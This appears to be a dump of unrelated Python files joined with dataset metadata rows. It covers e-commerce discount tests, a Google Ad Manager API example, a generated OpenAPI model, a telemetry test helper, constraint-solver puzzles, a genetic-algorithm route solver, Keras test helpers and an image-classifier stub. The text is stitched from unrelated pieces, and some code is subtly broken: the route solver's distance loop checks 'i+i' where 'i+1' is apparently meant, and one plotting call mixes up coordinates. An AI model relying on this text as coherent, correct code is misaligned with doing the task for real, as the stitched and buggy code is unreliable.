def test_applies_correctly_to_basket_which_exceeds_condition(self):
add_products(self.basket, [(D('12.00'), 2), (D('10.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(2, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_exceeds_condition_but_with_smaller_prices_than_discount(self):
add_products(self.basket, [(D('2.00'), 2), (D('1.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('1.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(2, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountAppliedWithValueCondition(TestCase):
def setUp(self):
range = models.Range.objects.create(
name="All products", includes_all_products=True)
self.condition = models.ValueCondition.objects.create(
range=range,
type=models.Condition.VALUE,
value=D('10.00'))
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=range,
type=models.Benefit.FIXED,
value=D('3.00'))
self.offer = mock.Mock()
self.basket = factories.create_basket(empty=True)
def test_applies_correctly_to_empty_basket(self):
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('0.00'), result.discount)
self.assertEqual(0, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_single_item_basket_which_matches_condition(self):
add_products(self.basket, [(D('10.00'), 1)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(1, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_matches_condition(self):
add_products(self.basket, [(D('5.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_exceeds_condition(self):
add_products(self.basket, [(D('4.00'), 3)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(3, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_exceeds_condition_but_matches_boundary(self):
add_products(self.basket, [(D('5.00'), 3)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(3, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountWithMaxItemsSetAppliedWithValueCondition(TestCase):
def setUp(self):
range = models.Range.objects.create(
name="All products", includes_all_products=True)
self.condition = models.ValueCondition.objects.create(
range=range,
type=models.Condition.VALUE,
value=D('10.00'))
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=range,
type=models.Benefit.FIXED,
value=D('3.00'),
max_affected_items=1)
self.offer = mock.Mock()
self.basket = factories.create_basket(empty=True)
def test_applies_correctly_to_empty_basket(self):
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('0.00'), result.discount)
self.assertEqual(0, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_single_item_basket_which_matches_condition(self):
add_products(self.basket, [(D('10.00'), 1)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(1, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_matches_condition(self):
add_products(self.basket, [(D('5.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_exceeds_condition(self):
add_products(self.basket, [(D('4.00'), 3)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(3, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_exceeds_condition_but_matches_boundary(self):
add_products(self.basket, [(D('5.00'), 3)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(1, self.basket.num_items_without_discount)
def test_applies_correctly_to_multi_item_basket_which_matches_condition_but_with_lower_prices_than_discount(self):
add_products(self.basket, [(D('2.00'), 6)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('2.00'), result.discount)
self.assertEqual(5, self.basket.num_items_with_discount)
self.assertEqual(1, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountBenefit(TestCase):
def test_requires_a_benefit_value(self):
rng = models.Range.objects.create(
name="", includes_all_products=True)
benefit = models.Benefit(
type=models.Benefit.FIXED, range=rng
)
with self.assertRaises(ValidationError):
benefit.clean()
def test_requires_a_range(self):
benefit = models.Benefit(
type=models.Benefit.FIXED, value=10
)
with self.assertRaises(ValidationError):
benefit.clean()
| 46.774286
| 130
| 0.679311
|
4a0225e0e4601daeae03d70b8965443baca73be4
| 2,059
|
py
|
Python
|
examples/ad_manager/v202002/cms_metadata_service/get_all_cms_metadata_values.py
|
jasperan/googleads-python-lib
|
6add9a7cc6148e98ada8097586a8eb1b47b2a8fd
|
[
"Apache-2.0"
] | null | null | null |
examples/ad_manager/v202002/cms_metadata_service/get_all_cms_metadata_values.py
|
jasperan/googleads-python-lib
|
6add9a7cc6148e98ada8097586a8eb1b47b2a8fd
|
[
"Apache-2.0"
] | null | null | null |
examples/ad_manager/v202002/cms_metadata_service/get_all_cms_metadata_values.py
|
jasperan/googleads-python-lib
|
6add9a7cc6148e98ada8097586a8eb1b47b2a8fd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets all CmsMetadataValues."""
# Import appropriate modules from the client library.
from __future__ import print_function
from googleads import ad_manager
def main(client):
# Initialize appropriate service.
cms_metadata_service = client.GetService(
'CmsMetadataService', version='v202002')
# Create a statement to select CmsMetadataValues.
statement = ad_manager.StatementBuilder(version='v202002')
# Retrieve a small amount of values at a time, paging
# through until all values have been retrieved.
while True:
response = cms_metadata_service.getCmsMetadataValuesByStatement(
statement.ToStatement())
if 'results' in response and len(response['results']):
for cms_metadata_value in response['results']:
# Print out some information for each value.
print(('CMS metadata value with Id %d and name "%s", associated with '
'the CmsMetadataKey with id %d and name "%s", was found.\n') %
(cms_metadata_value['cmsMetadataValueId'],
cms_metadata_value['valueName'], cms_metadata_value['key']['id'],
cms_metadata_value['key']['name']))
statement.offset += statement.limit
else:
break
print('\nNumber of results found: %s' % response['totalResultSetSize'])
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
| 36.767857
| 80
| 0.721224
|
4a0226dee816f314e90de6a6bae95dbe4bf2ad0c
| 5,947
|
py
|
Python
|
signing_today_client/models/signature_status_changed_notification_document.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
signing_today_client/models/signature_status_changed_notification_document.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
signing_today_client/models/signature_status_changed_notification_document.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Signing Today Web
*Signing Today* is the perfect Digital Signature Gateway. Whenever in Your workflow You need to add one or more Digital Signatures to Your document, *Signing Today* is the right choice. You prepare Your documents, *Signing Today* takes care of all the rest: send invitations (`signature tickets`) to signers, collects their signatures, send You back the signed document. Integrating *Signing Today* in Your existing applications is very easy. Just follow these API specifications and get inspired by the many examples presented hereafter. # noqa: E501
The version of the OpenAPI document: 2.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from signing_today_client.configuration import Configuration
class SignatureStatusChangedNotificationDocument(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'display_name': 'str',
'id': 'int',
'order': 'int'
}
attribute_map = {
'display_name': 'display_name',
'id': 'id',
'order': 'order'
}
def __init__(self, display_name=None, id=None, order=None, local_vars_configuration=None): # noqa: E501
"""SignatureStatusChangedNotificationDocument - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._display_name = None
self._id = None
self._order = None
self.discriminator = None
self.display_name = display_name
self.id = id
self.order = order
@property
def display_name(self):
"""Gets the display_name of this SignatureStatusChangedNotificationDocument. # noqa: E501
:return: The display_name of this SignatureStatusChangedNotificationDocument. # noqa: E501
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""Sets the display_name of this SignatureStatusChangedNotificationDocument.
:param display_name: The display_name of this SignatureStatusChangedNotificationDocument. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and display_name is None: # noqa: E501
raise ValueError("Invalid value for `display_name`, must not be `None`") # noqa: E501
self._display_name = display_name
@property
def id(self):
"""Gets the id of this SignatureStatusChangedNotificationDocument. # noqa: E501
:return: The id of this SignatureStatusChangedNotificationDocument. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this SignatureStatusChangedNotificationDocument.
:param id: The id of this SignatureStatusChangedNotificationDocument. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and id is None: # noqa: E501
raise ValueError("Invalid value for `id`, must not be `None`") # noqa: E501
self._id = id
@property
def order(self):
"""Gets the order of this SignatureStatusChangedNotificationDocument. # noqa: E501
:return: The order of this SignatureStatusChangedNotificationDocument. # noqa: E501
:rtype: int
"""
return self._order
@order.setter
def order(self, order):
"""Sets the order of this SignatureStatusChangedNotificationDocument.
:param order: The order of this SignatureStatusChangedNotificationDocument. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and order is None: # noqa: E501
raise ValueError("Invalid value for `order`, must not be `None`") # noqa: E501
self._order = order
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SignatureStatusChangedNotificationDocument):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, SignatureStatusChangedNotificationDocument):
return True
return self.to_dict() != other.to_dict()
| 33.789773
| 557
| 0.633092
|
4a02279b35ad0ed3438abdea95231661ea353258
| 1,862
|
py
|
Python
|
tools/telemetry/telemetry/page/page_measurement_unittest_base.py
|
anirudhSK/chromium
|
a8f23c87e656ab9ba49de9ccccbc53f614cdcb41
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
tools/telemetry/telemetry/page/page_measurement_unittest_base.py
|
anirudhSK/chromium
|
a8f23c87e656ab9ba49de9ccccbc53f614cdcb41
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
tools/telemetry/telemetry/page/page_measurement_unittest_base.py
|
anirudhSK/chromium
|
a8f23c87e656ab9ba49de9ccccbc53f614cdcb41
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2015-04-17T13:19:09.000Z
|
2021-10-21T12:55:15.000Z
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.core import util
from telemetry.page import page_runner
from telemetry.page import page as page_module
from telemetry.page import page_set
from telemetry.page import test_expectations
from telemetry.unittest import options_for_unittests
class PageMeasurementUnitTestBase(unittest.TestCase):
"""unittest.TestCase-derived class to help in the construction of unit tests
for a measurement."""
def CreatePageSetFromFileInUnittestDataDir(self, test_filename):
return self.CreatePageSet('file://' + test_filename)
def CreatePageSet(self, test_filename):
base_dir = util.GetUnittestDataDir()
ps = page_set.PageSet(file_path=base_dir)
page = page_module.Page(test_filename, ps, base_dir=base_dir)
setattr(page, 'smoothness', {'action': 'scroll'})
setattr(page, 'repaint', { "action": "repaint_continuously", "seconds": 2 })
ps.pages.append(page)
return ps
def RunMeasurement(self, measurement, ps,
expectations=test_expectations.TestExpectations(),
options=None):
"""Runs a measurement against a pageset, returning the rows its outputs."""
if options is None:
options = options_for_unittests.GetCopy()
assert options
temp_parser = options.CreateParser()
measurement.AddCommandLineOptions(temp_parser)
defaults = temp_parser.get_default_values()
for k, v in defaults.__dict__.items():
if hasattr(options, k):
continue
setattr(options, k, v)
measurement.CustomizeBrowserOptions(options)
options.output_file = None
options.output_format = 'none'
options.output_trace_tag = None
return page_runner.Run(measurement, ps, expectations, options)
| 37.24
| 80
| 0.749194
|
4a022a6319b9423c35a6989ab9a751215b2aaf76
| 854,077
|
py
|
Python
|
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
from constraint import Problem, Domain, AllDifferentConstraint
import matplotlib.pyplot as plt
import numpy as np
def _get_pairs(variables):
work = list(variables)
pairs = [ (work[i], work[i+1]) for i in range(len(work)-1) ]
return pairs
def n_queens(n=8):
def not_in_diagonal(a, b):
result = True
for i in range(1, n):
result = result and ( a != b + i )
return result
problem = Problem()
variables = { f'x{i}' for i in range(n) }
problem.addVariables(variables, Domain(set(range(1, n+1))))
problem.addConstraint(AllDifferentConstraint())
for pair in _get_pairs(variables):
problem.addConstraint(not_in_diagonal, pair)
return problem.getSolutions()
def magic_square(n=3):
def all_equal(*variables):
square = np.reshape(variables, (n, n))
diagonal = sum(np.diagonal(square))
b = True
for i in range(n):
b = b and sum(square[i, :]) == diagonal
b = b and sum(square[:, i]) == diagonal
if b:
print(square)
return b
problem = Problem()
variables = { f'x{i}{j}' for i in range(1, n+1) for j in range(1, n+1) }
problem.addVariables(variables, Domain(set(range(1, (n**2 + 2)))))
problem.addConstraint(all_equal, variables)
problem.addConstraint(AllDifferentConstraint())
return problem.getSolutions()
def plot_queens(solutions):
for solution in solutions:
for row, column in solution.items():
x = int(row.lstrip('x'))
y = column
plt.scatter(x, y, s=70)
plt.grid()
plt.show()
if __name__ == "__main__":
# solutions = n_queens(n=12)
# print(solutions)
# plot_queens(solutions)
solutions = magic_square(n=4)
for solution in solutions:
print(solution)
import numpy as np
import random
import operator
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from matplotlib import animation
from realtime_plot import realtime_plot
from threading import Thread, Event
from time import sleep
seaborn.set_style("dark")
stop_animation = Event()
# def animate_cities_and_routes():
# global route
# def wrapped():
# # create figure
# sleep(3)
# print("thread:", route)
# figure = plt.figure(figsize=(14, 8))
# ax1 = figure.add_subplot(1, 1, 1)
# def animate(i):
# ax1.title.set_text("Real time routes")
# for city in route:
# ax1.scatter(city.x, city.y, s=70, c='b')
# ax1.plot([ city.x for city in route ], [city.y for city in route], c='r')
# animation.FuncAnimation(figure, animate, interval=100)
# plt.show()
# t = Thread(target=wrapped)
# t.start()
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for city in route:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].x, route[-1].y])
plt.show()
def animate_progress():
global route
global progress
global stop_animation
def animate():
# figure = plt.figure()
# ax1 = figure.add_subplot(1, 1, 1)
figure, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for city in route:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in route ], [city.y for city in route], c='r')
ax1[0].plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
Thread(target=animate).start()
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
class Fitness:
def __init__(self, route):
self.route = route
def distance(self):
distance = 0
for i in range(len(self.route)):
from_city = self.route[i]
to_city = self.route[i+1] if i+i < len(self.route) else self.route[0]
distance += (from_city - to_city)
return distance
def fitness(self):
return 1 / self.distance()
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
# return [ City(x=random.randint(0, 200), y=random.randint(0, 200)) for i in range(size) ]
def create_route(cities):
return random.sample(cities, len(cities))
def initial_population(popsize, cities):
return [ create_route(cities) for i in range(popsize) ]
def sort_routes(population):
"""This function calculates the fitness of each route in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, Fitness(route).fitness()) for i, route in enumerate(population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(population, elite_size):
sorted_pop = sort_routes(population)
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
# calculates the cumulative sum
# example:
# [5, 6, 7] => [5, 11, 18]
df['cum_sum'] = df['Fitness'].cumsum()
# calculates the cumulative percentage
# example:
# [5, 6, 7] => [5/18, 11/18, 18/18]
# [5, 6, 7] => [27.77%, 61.11%, 100%]
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(elite_size) ]
for i in range(len(sorted_pop) - elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ population[index] for index in result ]
def breed(parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(selection, elite_size):
pool = random.sample(selection, len(selection))
# for i in range(elite_size):
# children.append(selection[i])
children = [selection[i] for i in range(elite_size)]
children.extend([breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - elite_size)])
# for i in range(len(selection) - elite_size):
# child = breed(pool[i], pool[len(selection)-i-1])
# children.append(child)
return children
def mutate(route, mutation_rate):
route_length = len(route)
for swapped in range(route_length):
if(random.random() < mutation_rate):
swap_with = random.randint(0, route_length-1)
route[swapped], route[swap_with] = route[swap_with], route[swapped]
return route
def mutate_population(population, mutation_rate):
return [ mutate(route, mutation_rate) for route in population ]
def next_gen(current_gen, elite_size, mutation_rate):
select = selection(population=current_gen, elite_size=elite_size)
children = breed_population(selection=select, elite_size=elite_size)
return mutate_population(children, mutation_rate)
def genetic_algorithm(cities, popsize, elite_size, mutation_rate, generations, plot=True, prn=True):
global route
global progress
population = initial_population(popsize=popsize, cities=cities)
if plot:
animate_progress()
sorted_pop = sort_routes(population)
initial_route = population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
if prn:
print(f"Initial distance: {distance}")
try:
if plot:
progress = [ distance ]
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
sorted_pop = sort_routes(population)
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
else:
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
distance = 1 / sort_routes(population)[0][1]
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
stop_animation.set()
final_route_index = sort_routes(population)[0][0]
final_route = population[final_route_index]
if prn:
print("Final route:", final_route)
return initial_route, final_route, distance
if __name__ == "__main__":
cities = generate_cities(25)
initial_route, final_route, distance = genetic_algorithm(cities=cities, popsize=120, elite_size=19, mutation_rate=0.0019, generations=1800)
# plot_routes(initial_route, final_route)
import numpy
import matplotlib.pyplot as plt
import cv2
from PIL import Image
from multiprocessing import Process
def fig2img ( fig ):
"""
brief Convert a Matplotlib figure to a PIL Image in RGBA format and return it
param fig a matplotlib figure
return a Python Imaging Library ( PIL ) image
"""
# put the figure pixmap into a numpy array
buf = fig2data ( fig )
w, h, d = buf.shape
return Image.frombytes( "RGB", ( w ,h ), buf.tostring( ) )
def fig2data ( fig ):
"""
brief Convert a Matplotlib figure to a 4D numpy array with RGBA channels and return it
param fig a matplotlib figure
return a numpy 3D array of RGBA values
"""
# draw the renderer
fig.canvas.draw ( )
# Get the RGBA buffer from the figure
w,h = fig.canvas.get_width_height()
buf = numpy.fromstring ( fig.canvas.tostring_rgb(), dtype=numpy.uint8 )
buf.shape = ( w, h,3 )
# canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode
buf = numpy.roll ( buf, 3, axis = 2 )
return buf
if __name__ == "__main__":
pass
# figure = plt.figure()
# plt.plot([3, 5, 9], [3, 19, 23])
# img = fig2img(figure)
# img.show()
# while True:
# frame = numpy.array(img)
# # Convert RGB to BGR
# frame = frame[:, :, ::-1].copy()
# print(frame)
# cv2.imshow("test", frame)
# if cv2.waitKey(0) == ord('q'):
# break
# cv2.destroyAllWindows()
def realtime_plot(route):
figure = plt.figure(figsize=(14, 8))
plt.title("Real time routes")
for city in route:
plt.scatter(city.x, city.y, s=70, c='b')
plt.plot([ city.x for city in route ], [city.y for city in route], c='r')
img = numpy.array(fig2img(figure))
cv2.imshow("test", img)
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
plt.close(figure)
from genetic import genetic_algorithm, generate_cities, City
import operator
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def train():
cities = load_cities()
generations = 1000
popsizes = [60, 100, 140, 180]
elitesizes = [5, 15, 25, 35, 45]
mutation_rates = [0.0001, 0.0005, 0.001, 0.005, 0.01]
total_iterations = len(popsizes) * len(elitesizes) * len(mutation_rates)
iteration = 0
tries = {}
for popsize in popsizes:
for elite_size in elitesizes:
for mutation_rate in mutation_rates:
iteration += 1
init_route, final_route, distance = genetic_algorithm( cities=cities,
popsize=popsize,
elite_size=elite_size,
mutation_rate=mutation_rate,
generations=generations,
plot=False,
prn=False)
progress = iteration / total_iterations
percentage = progress * 100
print(f"[{percentage:5.2f}%] [Iteration:{iteration:3}/{total_iterations:3}] [popsize={popsize:3} elite_size={elite_size:2} mutation_rate={mutation_rate:7}] Distance: {distance:4}")
tries[(popsize, elite_size, mutation_rate)] = distance
min_gen = min(tries.values())
reversed_tries = { v:k for k, v in tries.items() }
best_combination = reversed_tries[min_gen]
print("Best combination:", best_combination)
if __name__ == "__main__":
train()
# best parameters
# popsize elitesize mutation_rateqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
# 90 25 0.0001
# 110 10 0.001
# 130 10 0.005
# 130 20 0.001
# 150 25 0.001
import os
def load_data(path):
"""
Load dataset
"""
input_file = os.path.join(path)
with open(input_file, "r") as f:
data = f.read()
return data.split('\n')
import numpy as np
from keras.losses import sparse_categorical_crossentropy
from keras.models import Sequential
from keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
def _test_model(model, input_shape, output_sequence_length, french_vocab_size):
if isinstance(model, Sequential):
model = model.model
assert model.input_shape == (None, *input_shape[1:]),\
'Wrong input shape. Found input shape {} using parameter input_shape={}'.format(model.input_shape, input_shape)
assert model.output_shape == (None, output_sequence_length, french_vocab_size),\
'Wrong output shape. Found output shape {} using parameters output_sequence_length={} and french_vocab_size={}'\
.format(model.output_shape, output_sequence_length, french_vocab_size)
assert len(model.loss_functions) > 0,\
'No loss function set. Apply the compile function to the model.'
assert sparse_categorical_crossentropy in model.loss_functions,\
'Not using sparse_categorical_crossentropy function for loss.'
def test_tokenize(tokenize):
sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
tokenized_sentences, tokenizer = tokenize(sentences)
assert tokenized_sentences == tokenizer.texts_to_sequences(sentences),\
'Tokenizer returned and doesn\'t generate the same sentences as the tokenized sentences returned. '
def test_pad(pad):
tokens = [
[i for i in range(4)],
[i for i in range(6)],
[i for i in range(3)]]
padded_tokens = pad(tokens)
padding_id = padded_tokens[0][-1]
true_padded_tokens = np.array([
[i for i in range(4)] + [padding_id]*2,
[i for i in range(6)],
[i for i in range(3)] + [padding_id]*3])
assert isinstance(padded_tokens, np.ndarray),\
'Pad returned the wrong type. Found {} type, expected numpy array type.'
assert np.all(padded_tokens == true_padded_tokens), 'Pad returned the wrong results.'
padded_tokens_using_length = pad(tokens, 9)
assert np.all(padded_tokens_using_length == np.concatenate((true_padded_tokens, np.full((3, 3), padding_id)), axis=1)),\
'Using length argument return incorrect results'
def test_simple_model(simple_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = simple_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_embed_model(embed_model):
input_shape = (137861, 21)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = embed_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_encdec_model(encdec_model):
input_shape = (137861, 15, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_bd_model(bd_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = bd_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_model_final(model_final):
input_shape = (137861, 15)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = model_final(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
CATEGORIES = ["Dog", "Cat"]
IMG_SIZE = 100
DATADIR = r"C:\Users\STRIX\Desktop\CatnDog\PetImages"
TRAINING_DIR = r"E:\datasets\CatnDog\Training"
TESTING_DIR = r"E:\datasets\CatnDog\Testing"
import cv2
import tensorflow as tf
import os
import numpy as np
import random
from settings import *
from tqdm import tqdm
# CAT_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Cat"
# DOG_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Dog"
MODEL = "Cats-vs-dogs-new-6-0.90-CNN"
def prepare_image(path):
image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
return image
# img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
# img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
# return img.reshape(-1, IMG_SIZE, IMG_SIZE, 1)
def load_model():
return tf.keras.models.load_model(f"{MODEL}.model")
def predict(img):
prediction = model.predict([prepare_image(img)])[0][0]
return int(prediction)
if __name__ == "__main__":
model = load_model()
